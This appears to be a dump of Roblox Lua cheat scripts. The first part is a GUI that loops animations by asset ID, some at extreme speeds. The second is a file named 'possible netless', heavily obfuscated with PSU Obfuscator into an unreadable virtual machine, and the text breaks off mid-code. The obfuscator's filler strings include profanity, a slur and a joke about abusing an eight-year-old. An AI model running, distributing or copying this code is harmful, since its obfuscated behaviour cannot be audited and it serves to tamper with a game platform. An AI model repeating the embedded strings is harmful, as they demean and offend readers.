BarrelRollACTIVE then 1305 | BarrelRoll.BackgroundColor3 = loc 1306 | while wait() do 1307 | if track.IsPlaying == false then 1308 | if BarrelRollACTIVE then 1309 | track:Play(.1, 1, 1) 1310 | end 1311 | end 1312 | end 1313 | else 1314 | track:Stop() 1315 | BarrelRoll.BackgroundColor3 = col 1316 | end 1317 | end) 1318 | 1319 | local Anim = Instance.new("Animation") 1320 | Anim.AnimationId = "rbxassetid://180612465" 1321 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1322 | local ScaredACTIVE = false 1323 | Scared.MouseButton1Click:connect(function() 1324 | ScaredACTIVE = not ScaredACTIVE 1325 | if ScaredACTIVE then 1326 | Scared.BackgroundColor3 = loc 1327 | while wait() do 1328 | if track.IsPlaying == false then 1329 | if ScaredACTIVE then 1330 | track:Play(.1, 1, 1) 1331 | end 1332 | end 1333 | end 1334 | else 1335 | track:Stop() 1336 | Scared.BackgroundColor3 = col 1337 | end 1338 | end) 1339 | 1340 | local Anim = Instance.new("Animation") 1341 | Anim.AnimationId = "rbxassetid://33796059" 1342 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1343 | local InsaneACTIVE = false 1344 | Insane.MouseButton1Click:connect(function() 1345 | InsaneACTIVE = not InsaneACTIVE 1346 | if InsaneACTIVE then 1347 | track:Play(.1, 1, 1e8) 1348 | Insane.BackgroundColor3 = loc 1349 | else 1350 | track:Stop() 1351 | Insane.BackgroundColor3 = col 1352 | end 1353 | end) 1354 | 1355 | local Anim = Instance.new("Animation") 1356 | Anim.AnimationId = "rbxassetid://33169583" 1357 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1358 | local ArmDetachACTIVE = false 1359 | ArmDetach.MouseButton1Click:connect(function() 1360 | ArmDetachACTIVE = not ArmDetachACTIVE 1361 | if ArmDetachACTIVE then 1362 | ArmDetach.BackgroundColor3 = loc 1363 | while wait() do 1364 | if track.IsPlaying == false then 1365 | if ArmDetachACTIVE then 1366 | track:Play(.1, 1, 1e6) 1367 | end 1368 | end 1369 | end 1370 | else 1371 | track:Stop() 1372 | ArmDetach.BackgroundColor3 = col 1373 | end 1374 | end) 1375 | 1376 | local Anim = Instance.new("Animation") 1377 | Anim.AnimationId = "rbxassetid://35978879" 1378 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1379 | local SwordSliceACTIVE = false 1380 | SwordSlice.MouseButton1Click:connect(function() 1381 | SwordSliceACTIVE = not SwordSliceACTIVE 1382 | if SwordSliceACTIVE then 1383 | track:Play(.1, 1, 1) 1384 | SwordSlice.BackgroundColor3 = loc 1385 | else 1386 | track:Stop() 1387 | SwordSlice.BackgroundColor3 = col 1388 | end 1389 | end) 1390 | 1391 | local Anim = Instance.new("Animation") 1392 | Anim.AnimationId = "rbxassetid://27432691" 1393 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1394 | local InsaneArmsACTIVE = false 1395 | InsaneArms.MouseButton1Click:connect(function() 1396 | InsaneArmsACTIVE = not InsaneArmsACTIVE 1397 | if InsaneArmsACTIVE then 1398 | InsaneArms.BackgroundColor3 = loc 1399 | while wait() do 1400 | if track.IsPlaying == false then 1401 | if InsaneArmsACTIVE then 1402 | track:Play(.1, 1, 1e4) 1403 | end 1404 | end 1405 | end 1406 | else 1407 | track:Stop() 1408 | InsaneArms.BackgroundColor3 = col 1409 | end 1410 | end) 1411 | -- R15 1412 | local Anim = Instance.new("Animation") 1413 | Anim.AnimationId = "rbxassetid://674871189" 1414 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1415 | local CrazySlashACTIVE = false 1416 | CrazySlash.MouseButton1Click:connect(function() 1417 | CrazySlashACTIVE = not CrazySlashACTIVE 1418 | if CrazySlashACTIVE then 1419 | CrazySlash.BackgroundColor3 = rloc 1420 | while wait() do 1421 | if track.IsPlaying == false then 1422 | if CrazySlashACTIVE then 1423 | track:Play(.1, 1, 1) 1424 | end 1425 | end 1426 | end 1427 | else 1428 | track:Stop() 1429 | CrazySlash.BackgroundColor3 = rcol 1430 | end 1431 | end) 1432 | 1433 | local Anim = Instance.new("Animation") 1434 | Anim.AnimationId = "rbxassetid://582855105" 1435 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1436 | local OpenACTIVE = false 1437 | Open.MouseButton1Click:connect(function() 1438 | OpenACTIVE = not OpenACTIVE 1439 | if OpenACTIVE then 1440 | Open.BackgroundColor3 = rloc 1441 | while wait() do 1442 | if track.IsPlaying == false then 1443 | if OpenACTIVE then 1444 | track:Play(.1, 1, 1) 1445 | end 1446 | end 1447 | end 1448 | else 1449 | track:Stop() 1450 | Open.BackgroundColor3 = rcol 1451 | end 1452 | end) 1453 | 1454 | local Anim = Instance.new("Animation") 1455 | Anim.AnimationId = "rbxassetid://754658275" 1456 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1457 | local R15SpinnerACTIVE = false 1458 | R15Spinner.MouseButton1Click:connect(function() 1459 | R15SpinnerACTIVE = not R15SpinnerACTIVE 1460 | if R15SpinnerACTIVE then 1461 | R15Spinner.BackgroundColor3 = rloc 1462 | while wait() do 1463 | if track.IsPlaying == false then 1464 | if R15SpinnerACTIVE then 1465 | track:Play(.1, 1, 1) 1466 | end 1467 | end 1468 | end 1469 | else 1470 | track:Stop() 1471 | R15Spinner.BackgroundColor3 = rcol 1472 | end 1473 | end) 1474 | 1475 | local Anim = Instance.new("Animation") 1476 | Anim.AnimationId = "rbxassetid://582384156" 1477 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1478 | local ArmsOutACTIVE = false 1479 | ArmsOut.MouseButton1Click:connect(function() 1480 | ArmsOutACTIVE = not ArmsOutACTIVE 1481 | if ArmsOutACTIVE then 1482 | ArmsOut.BackgroundColor3 = rloc 1483 | while wait() do 1484 | if track.IsPlaying == false then 1485 | if ArmsOutACTIVE then 1486 | track:Play(.1, 1, 1) 1487 | end 1488 | end 1489 | end 1490 | else 1491 | track:Stop() 1492 | ArmsOut.BackgroundColor3 = rcol 1493 | end 1494 | end) 1495 | 1496 | local Anim = Instance.new("Animation") 1497 | Anim.AnimationId = "rbxassetid://717879555" 1498 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1499 | local FloatSlashACTIVE = false 1500 | FloatSlash.MouseButton1Click:connect(function() 1501 | FloatSlashACTIVE = not FloatSlashACTIVE 1502 | if FloatSlashACTIVE then 1503 | FloatSlash.BackgroundColor3 = rloc 1504 | while wait() do 1505 | if track.IsPlaying == false then 1506 | if FloatSlashACTIVE then 1507 | track:Play(.1, 1, 1) 1508 | end 1509 | end 1510 | end 1511 | else 1512 | track:Stop() 1513 | FloatSlash.BackgroundColor3 = rcol 1514 | end 1515 | end) 1516 | 1517 | local Anim = Instance.new("Animation") 1518 | Anim.AnimationId = "rbxassetid://708553116" 1519 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1520 | WeirdZombieACTIVE = false 1521 | WeirdZombie.MouseButton1Click:connect(function() 1522 | WeirdZombieACTIVE = not WeirdZombieACTIVE 1523 | if WeirdZombieACTIVE then 1524 | WeirdZombie.BackgroundColor3 = rloc 1525 | while wait() do 1526 | if track.IsPlaying == false then 1527 | if WeirdZombieACTIVE then 1528 | track:Play(.1, 1, 1) 1529 | end 1530 | end 1531 | end 1532 | else 1533 | track:Stop() 1534 | WeirdZombie.BackgroundColor3 = rcol 1535 | end 1536 | end) 1537 | 1538 | local Anim = Instance.new("Animation") 1539 | Anim.AnimationId = "rbxassetid://746398327" 1540 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1541 | DownSlashACTIVE = false 1542 | DownSlash.MouseButton1Click:connect(function() 1543 | DownSlashACTIVE = not DownSlashACTIVE 1544 | if DownSlashACTIVE then 1545 | DownSlash.BackgroundColor3 = rloc 1546 | while wait() do 1547 | if track.IsPlaying == false then 1548 | if DownSlashACTIVE then 1549 | track:Play(.1, 1, 1) 1550 | end 1551 | end 1552 | end 1553 | else 1554 | track:Stop() 1555 | DownSlash.BackgroundColor3 = rcol 1556 | end 1557 | end) 1558 | 1559 | local Anim = Instance.new("Animation") 1560 | Anim.AnimationId = "rbxassetid://675025795" 1561 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1562 | PullACTIVE = false 1563 | Pull.MouseButton1Click:connect(function() 1564 | PullACTIVE = not PullACTIVE 1565 | if PullACTIVE then 1566 | Pull.BackgroundColor3 = rloc 1567 | while wait() do 1568 | if track.IsPlaying == false then 1569 | if PullACTIVE then 1570 | track:Play(.1, 1, 1) 1571 | end 1572 | end 1573 | end 1574 | else 1575 | track:Stop() 1576 | Pull.BackgroundColor3 = rcol 1577 | end 1578 | end) 1579 | 1580 | local Anim = Instance.new("Animation") 1581 | Anim.AnimationId = "rbxassetid://698251653" 1582 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1583 | CircleArmACTIVE = false 1584 | CircleArm.MouseButton1Click:connect(function() 1585 | CircleArmACTIVE = not CircleArmACTIVE 1586 | if CircleArmACTIVE then 1587 | CircleArm.BackgroundColor3 = rloc 1588 | while wait() do 1589 | if track.IsPlaying == false then 1590 | if CircleArmACTIVE then 1591 | track:Play(.1, 1, 1) 1592 | end 1593 | end 1594 | end 1595 | else 1596 | track:Stop() 1597 | CircleArm.BackgroundColor3 = rcol 1598 | end 1599 | end) 1600 | 1601 | local Anim = Instance.new("Animation") 1602 | Anim.AnimationId = "rbxassetid://696096087" 1603 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1604 | BendACTIVE = false 1605 | Bend.MouseButton1Click:connect(function() 1606 | BendACTIVE = not BendACTIVE 1607 | if BendACTIVE then 1608 | Bend.BackgroundColor3 = rloc 1609 | while wait() do 1610 | if track.IsPlaying == false then 1611 | if BendACTIVE then 1612 | track:Play(.1, 1, 1) 1613 | end 1614 | end 1615 | end 1616 | else 1617 | track:Stop() 1618 | Bend.BackgroundColor3 = rcol 1619 | end 1620 | end) 1621 | 1622 | local Anim = Instance.new("Animation") 1623 | Anim.AnimationId = "rbxassetid://675025570" 1624 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1625 | RotateSlashACTIVE = false 1626 | RotateSlash.MouseButton1Click:connect(function() 1627 | RotateSlashACTIVE = not RotateSlashACTIVE 1628 | if RotateSlashACTIVE then 1629 | RotateSlash.BackgroundColor3 = rloc 1630 | while wait() do 1631 | if track.IsPlaying == false then 1632 | if RotateSlashACTIVE then 1633 | track:Play(.1, 1, 1) 1634 | end 1635 | end 1636 | end 1637 | else 1638 | track:Stop() 1639 | RotateSlash.BackgroundColor3 = rcol 1640 | end 1641 | end) 1642 | 1643 | local Anim = Instance.new("Animation") 1644 | Anim.AnimationId = "rbxassetid://754656200" 1645 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 1646 | FlingArmsACTIVE = false 1647 | FlingArms.MouseButton1Click:connect(function() 1648 | FlingArmsACTIVE = not FlingArmsACTIVE 1649 | if FlingArmsACTIVE then 1650 | FlingArms.BackgroundColor3 = rloc 1651 | while wait() do 1652 | if track.IsPlaying == false then 1653 | if FlingArmsACTIVE then 1654 | track:Play(.1, 1, 10) 1655 | end 1656 | end 1657 | end 1658 | else 1659 | track:Stop() 1660 | FlingArms.BackgroundColor3 = rcol 1661 | end 1662 | end) 1663 | -------------------------------------------------------------------------------- /possible netless: -------------------------------------------------------------------------------- 1 | return(function(e,...)local M="This file was obfuscated using PSU Obfuscator 4.0.A | https://www.psu.dev/ & discord.gg/psu";local Z=e[(720291872)];local A=e[((872286426-#("oh Mr. Pools, thats a little close please dont touch me there... please Mr. Pools I am only eight years old please stop...")))];local n=e['M1oBPFV'];local o=e[((886124523-#("why the fuck would we sell a deobfuscator for a product we created.....")))];local B=e["JJ6SnmA"];local w=e[((#{344;184;980;}+440035269))];local m=e['dEEDk3X'];local h=e[((493880757-#("this isn't krnl support you bonehead moron")))];local F=e[(955560713)];local q=e.cQeQmE;local i=e[(988549808)];local O=e[(895699164)];local S=e[(350953750)];local C=e[((#{565;630;303;}+671686061))];local J=e[(650820050)];local b=e[((#{(function(...)return 230,964,74,...;end)(468,15)}+391626261))];local X=e[((215745439-#("i am not wally stop asking me for wally hub support please fuck off")))];local p=e['qFrpdOQZ'];local f=e["l6hIfyS"];local v=e[((#{}+45078393))];local U=e[(15319131)];local s=e[(454472801)];local z=e['nXanhn2'];local T=e['ENH07'];local k=e[((#{902;135;(function(...)return 589,107,301;end)()}+312481128))];local r=e[(175407291)];local t=e[((#{700;(function(...)return;end)()}+51171402))];local a=e[(708892133)];local x=e['rWkhsbT4'];local N=e[((93164231-#("why does psu.dev attract so many ddosing retards wtf")))];local j=e[((#{(function(...)return 889,1,702;end)()}+652623036))];local V=e[((#{364;680;(function(...)return 317;end)()}+539414644))];local E=((getfenv)or(function(...)return(_ENV);end));local c,d,l=({}),(""),(E(o));local c=((l[""..e[r].."\105\116"..e[n]..e[b]])or(l["\98"..e[k]..e[t]])or({}));local n=(((c)and(c["\98\120\111\114"]))or(function(e,l)local n,o=o,f;while((e>f)and(l>f))do local t,c=e%a,l%a;if t~=c then o=o+n;end;e,l,n=(e-t)/a,(l-c)/a,n*a;end;if ef do local l=e%a;if l>f then o=o+n;end;e,n=(e-l)/a,n*a;end;return(o);end));local u=(a^B);local y=(u-o);local D,g,I;local p=(d[""..e[r]..e[p]..e[t]..e[i]]);local L=(d[""..e[C].."\104\97"..e[s]]);local u=(d["\103"..e["Ik4Wr5lUeB"].."\117"..e[r]]);local u=(d["\115\117\98"]);local d=((l[""..e[S]..e[w].."\112"..e[h].."\99\107"])or(l[""..e[t].."\97\98"..e[x]..e[i]]["\117\110"..e[A].."\97\99"..e.VZWLWBI]));local Q=((l["\109\97\116\104"][""..e[x]..e['WgImlIJL'].."\101\120"..e[A]])or(function(l,e,...)return((l*a)^e);end));local W=(l["\114\97"..e.qylOX4eD2C..e["Ik4Wr5lUeB"]..e[i].."\116"]);local W=(l[""..e[t].."\121\112"..e[i]]);local P=(l[""..e[A]..e[h].."\105\114\115"]);local A=(l["\115"..e[i].."\116"..e[m]..e[i].."\116"..e[h]..e[t]..e[h]..e[r]..e[x].."\101"]);local W=(l["\115\101"..e[x]..e[i].."\99"..e[t]]);local A=(l[""..e[t]..e[F].."\110"..e[S]..e[m]..e[r]..e[i]..e[s]]);local S=(l[""..e[m]..e[h]..e[t].."\104"]["\102\108\111"..e[F]..e[s]]);D=((c["\108"..e['Ik4Wr5lUeB'].."\104\105\102\116"])or(function(l,e,...)if(e=e)and(a))or(c));end;end;local function c()local a,i,e,c=p(h,t,t+i);a=n(a,l);l=a%o;i=n(i,l);l=i%o;e=n(e,l);l=e%o;c=n(c,l);l=c%o;t=t+r;return((c*g)+(e*D)+(i*o)+a);end;local function i()local e=n(p(h,t,t),l);l=e%o;t=(t+a);return(e);end;local function r()local e,a=p(h,t,t+s);e=n(e,l);l=e%o;a=n(a,l);l=a%o;t=t+s;return((a*o)+e);end;local A=""..e[m];local function o(...)return({...}),W(A,...);end;local function U(...)local q=e["yv6ZqQ5en"];local Z=e[((#{992;306;}+928567000))];local m=e[((708892238-#("PSU|161027525v21222B11273172751L275102731327523d27f22I27f21o26o24Y21J1827F1X27f1r27F23823a26w1... oh wait")))];local D=e[(406310584)];local U=e[(505635135)];local L=e[((455354445-#("this isn't krnl support you bonehead moron")))];local W=e[((#{634;517;(function(...)return 883,...;end)(520,419,809,835)}+340156800))];local o=e[(886124452)];local J=e[(823405555)];local X=e[(727690609)];local w=e["CFctyScX"];local B=e[(340609866)];local A=e[((#{}+616705821))];local I=e[(895699164)];local b=e[((#{552;34;}+620512504))];local C=e.JJ6SnmA;local T=e[(724072498)];local V=e[((489530698-#("LuraphDeobfuscator.zip (oh god DMCA incoming everyone hide)")))];local N=e[(431830412)];local z=e[((866889121-#("please suck my cock :pleading:")))];local a=e["l6hIfyS"];local E=e[(388064671)];local y=e[(571175245)];local j=e[(602116989)];local O=e['p7onP2D'];local M=e[((434348836-#("Luraph v12.6 has been released!: changed absolutely fucking nothing but donate to my patreon!")))];local g=e[((#{}+15319131))];local S=e[(986068706)];local function F(...)local s=({});local k=({});local e=({});local v=i(l);for e=a,c(l)-o,o do k[e]=F();end;for r=a,c(l)-o,o do local d=i(l);if(d==D)then local l=i(l);e[r]=(l~=a);elseif(d==T)then while(true)do local l=c(l);e[r]=u(h,t,t+l-o);t=t+l;break;end;elseif(d==L)then while(true)do local t=c(l);local n=c(l);local c=o;local t=(f(n,o,D)*(m^C))+t;local l=f(n,Z,V);local n=((-o)^f(n,C));if(l==a)then if(t==a)then e[r]=(n*a);break;else l=o;c=a;end;elseif(l==E)then e[r]=(t==a)and(n*(o/a))or(n*(a/a));break;end;e[r]=Q(n,l-j)*(c+(t/(m^W)));break;end;elseif(d==q)then while(true)do local c=c(l);if(c==a)then e[r]=('');break;end;if(c>X)then local a,i=(''),(u(h,t,t+c-o));t=t+c;for e=o,#i,o do local e=n(p(u(i,e,e)),l);l=e%w;a=a..x[e];end;e[r]=a;else local o,a=(''),({p(h,t,t+c-o)});t=t+c;for a,e in P(a)do local e=n(e,l);l=e%w;o=o..x[e];end;e[r]=o;end;break;end;else e[r]=nil end;end;local n=c(l);for e=a,n-o,o do s[e]=({});end;for w=a,n-o,o do local n=i(l);if(n~=a)then n=n-o;local x,D,t,d,p,h=a,a,a,a,a,a;local u=f(n,o,I);if(u==m)then d=(r(l));x=(i(l));t=s[(c(l))];elseif(u==o)then d=(r(l));x=(i(l));t=(c(l));elseif(u==a)then h=(r(l));d=(r(l));x=(i(l));t=(r(l));elseif(u==I)then h=(r(l));d=(r(l));x=(i(l));t=s[(c(l))];elseif(u==y)then elseif(u==g)then h=(r(l));d=(r(l));x=(i(l));t=(c(l));p=({});for e=o,h,o do p[e]=({[a]=i(l),[o]=r(l)});end;end;if(f(n,b,b)==o)then D=s[c(l)];else D=s[w+o];end;if(f(n,B,B)==o)then d=e[d];end;if(f(n,y,y)==o)then h=e[h];end;if(f(n,g,g)==o)then t=e[t];end;if(f(n,A,A)==o)then p=({});for e=o,i(),o do p[e]=c();end;end;local e=s[w];e["cnnPJrQEh"]=p;e[-U]=D;e[M]=t;e[-N]=h;e[O]=d;e['QDOW']=x;end;end;local l=r(l);return({[J]=v;['Mb8']=k;["aTZIdhRq"]=l;[-z]=s;[43994.88325586724]=e;[-S]=a;});end;return(F(...));end;local function x(e,l,c,...)local D=e["Mb8"];local l=e[43994.88325586724];local l=e[-301713];local i=e[871866];local r=e["aTZIdhRq"];local e=0;return(function(...)local m="QDOW";local s={...};local o=306566;local f=l[e];local e=(true);local a=919686;local l={};local t=-998653;local u={};local e='cnnPJrQEh';local e=(359712304);local n=-654193;local e=({});local h=-(1);local p=(W(A,...)-1);for e=0,p,1 do if(e>=i)then u[e-i]=s[e+1];else l[e]=s[e+1];end;end;local s=p-i+1;while(true)do local e=f;local i=e[m];f=e[n];if(i<=32)then if(i<=15)then if(i<=7)then if(i<=3)then if(i<=1)then if(i>0)then l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];e=e[n];elseif(i<1)then l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];e=e[n];end;elseif(i>2)then e=e[n];l[e[o]]=c[e[a]];e=e[n];local c=e[o];l[c]=l[c]();e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]][e[a]]=e[t];e=e[n];e=e[n];elseif(i<3)then l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];e=e[n];end;elseif(i<=5)then if(i>4)then l[e[o]]=e[a];e=e[n];local i=e[o];l[i]=l[i](d(l,i+1,e[a]));for e=i+1,r do l[e]=nil;end;e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=e[a];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=l[e[a]][e[t]];e=e[n];l[e[o]]=l[e[a]]*l[e[t]];e=e[n];l[e[o]]=c[e[a]];e=e[n];e=e[n];elseif(i<5)then l[e[o]]=y(e[a]);end;elseif(i==6)then local o=e[o];local t=e[t];local n=o+2;local o=({l[o](l[o+1],l[n]);});for e=1,t do l[n+e]=o[e];end;local o=o[1];if(o)then l[n]=o;f=e[a];end;elseif(i<=7)then l[e[o]]=l[e[a]];e=e[n];l[e[o]]=e[a];e=e[n];local t=e[o];l[t](d(l,t+1,e[a]));for e=t+1,r do l[e]=nil;end;e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]();e=e[n];l[e[o]]=c[e[a]];e=e[n];l[e[o]]=e[a];e=e[n];local 